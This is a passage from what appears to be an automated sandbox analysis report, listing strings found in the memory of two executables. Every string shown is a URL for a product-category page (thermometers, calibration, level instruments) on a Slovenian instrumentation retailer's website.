                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/i
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/o
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/p
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/t
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-temperature/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-tlaka/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/dodatni-izdelki-in-dodatki-za-nivo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/nivojska-stikala-wika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/prikazovalniki-nivoja/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/sila/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 